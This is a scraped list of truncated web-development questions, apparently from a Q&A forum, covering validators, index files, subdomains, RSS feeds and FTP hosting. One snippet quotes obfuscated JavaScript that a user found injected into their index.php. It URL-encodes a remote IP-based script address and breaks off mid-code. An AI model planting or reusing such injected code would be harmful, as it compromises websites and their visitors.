May websites, including professional ones usually have a "W3C Markup Validator" and "W3C CSS Validator." Why do you put them there? Is it just pride or is it justified? If it is more than pride, what justifies them?
...
Is there any way to detect if someone is using a browser addon to download videos from my website?
...
Hello All,
this may be not a right place to ask this question, but i can get best answer only from here, so i m posting here.
i m a web developer and working with technology PHP,MySQL, JavaScript,jQuery,AJAX, CSS, HTML, JSON
i daily surf few websites regarding web development , i know there are a lot of website with very goo...
Hi,
I'm curious what are some effects/downside of not putting an index.html file to your directories (e.g images). I know when an index file is not present to a directory, files inside that directory are no longer private and will be visible to the browsers when point (eg yoursite.com/images/). Aside from that what are some big effects ...
Hi,
I'm looking for PHP script samples of websites. I'm just done reading a text book on PHP and I want to check out some of the various implementations.
Thanks
...
Already checked exisitng questions for this, but didn't find an exact match.
My aim is to replace characters (like spaces) on a webpage with a small image using css.
Example:
<p><span>This is a text</span></p>
becomes:
<p><span>ThisIMGisIMGaIMGtext</span></p>
(where IMG stands for a visible image (middot-pic for a space f.e.))
I...
I would like to code a little web site that will contain several sections like "Home", "Gallery", "Contact Us", "FAQs", and so on.
I thought to do this in one HTML by putting each section in a div and show only one div per time (using Javascript / jQuery), based on the chosen menu button.
Alternatively, I could create a separate HTML p...
I understand that calling the home page index.html is a convention. Is that right ?
Does this name has any special meaning (maybe for search engines) ?
...
Hi,
Is it possible to retrieve/get the html source code of a certain website and use it in a ASP.NET web application to display them? (without using the copy-paste, of course)
I want my ASP.NET web application to use them as part of a code sample feature I currently working on.
I'm also considering working it on PHP. Any suggestions?
...
I have a Lighttpd server plus mod_fastcgi. And today I had Internal Server Error 500. I've checked my error log and it goes like this:
2010-04-22 22:59:14: (server.c.1464) server stopped by UID = 0 PID = 3332
2010-04-22 22:59:15: (mod_fastcgi.c.1768) connect failed: No such file or directory on unix:/tmp/php.socket-5
2010-04-22 22:59:1...
More than a simple wireframe, I´d like to create a complete prototype, fully functional & dynamic with data and rich interactions... Do you know any tool outthere? i´m looking for something really quick and easy, i don´t want to code.
A friend told me about Justinmind Prototyper, any other guess?
...
I was finally able to setup subdomains but now I have a problem when I try and access the subdomain by itself. For instance, when I visit sub.domain.com, I get a page not found error. However, when I visit sub.domain.com/index.php, I see my page.
My theory is that when I visit sub.domain.com, the index file it searches for is not in the...
I've searched Google, but only found information on how to setup a feedburner for wordpress or other blogging services. I've also searched stackoverflow, but not found the right information.
I'm creating a website, for which I want to have an RSS. Feedburner seems to be a good, free option - so I'd like to use that.
When I go to feedbu...
Hi guys,
I have a simple question, but I can't find out the answer. I'm wondering if we can see that a website is built using the JEE technology, or servlets/JSP. I think it could be possible to look for specials pages from the server (404, wrong parameters, ...) in some cases, but what about the everyday use ?
In fact, I look for a co...
Me and my friend started working together as partners , we have decided to make Kick-as* website after website.
We have the ideas written down like 100's of them (yes we are choosing best and easy among them first).
My friend does the layout design and arranging things , and my part is coding and server management.
The little problem ...
I am new to flash and just learned some action Script 3 with some events.
I have to build site with dynamic menus and then contents for each page using xml.
Is there any example on web to show how I can build the site.
What is GAIA , will it help me or I should code my self
Thanks
...
Where could I find HTML website templates geared toward a programmer's website?
I have looked on Google but couldn't find templates specifically for a programmer's website.
EDIT: To clairify, I want this as information about me, my projects, a blog, and some other stuff.
...
I have seen that , this happend twice that , in my root index.php file.
I have this thing added
<html><body><script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31') + " Oaoz5='1'vxoq5='1'>";str = str.replace...
What ways do you use to protect copy righted images in your website?
...
can i have multiple iis ftp sites using something similar to web site's unasigned host headers?
i have a dedicated server in a hosting facility and want to make a web site for each of my clients. to add/ remove files and content i want ftp access to each of the sites root folders.
lets say i have 10 sites set up using unasigned host he...